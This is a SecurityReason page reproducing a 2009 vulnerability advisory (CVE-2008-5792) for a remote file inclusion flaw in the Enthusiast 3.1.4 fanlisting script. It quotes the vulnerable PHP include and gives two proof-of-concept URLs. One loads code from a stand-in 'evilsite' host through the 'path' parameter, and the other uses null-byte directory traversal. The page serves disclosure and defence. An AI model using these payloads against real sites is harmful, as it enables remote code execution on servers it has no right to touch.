|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4853 CVE : CVE-2008-5792 CWE : CWE-94 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : bugreport Published : 04.01.2009
Advisory Content : ########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: Enthusiast 3 Remote Code Execution # Vendor: http://scripts.indisguise.org/enthusiast/ # Bug: File Inclusion # Vulnerable Version: 3.1.4 (prior versions also may be affected) # Exploitation: Remote with browser # Fix: N/A # Original Advisory: http://www.bugreport.ir/index_57.htm ################################################################### #################### - Description: #################### Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily customizable for other types of listings as well?cliques, physical listings, taboo listings, and the like. #################### - Vulnerability: #################### +--> File Inclusion When register_globals is enabled, Its possible to include arbitrary files from local or remote resources. #################### - Code Snippet: #################### /show_joined.php #line:261-264 <p class="show_joined_credits"> <a href="http://scripts.indisguise.org">Powered by Enthusiast <?php include $path . 'show_enthversion.php' ?></a> </p> #################### - Exploits/POCs: #################### POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite / (this one includes show_enthversion.php from evilsite) POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscrip t.php%00 (this requiers magic_quotes_gpc to be disabled) #################### - Credit : #################### AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.comz References : http://www.securityfocus.com/bid/32205
http://www.securityfocus.com/archive/1/archive/1/498161/100/0/threaded
http://www.milw0rm.com/exploits/7059
http://www.frsirt.com/english/advisories/2008/3073
http://www.bugreport.ir/index_57.htm
http://secunia.com/advisories/32628  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |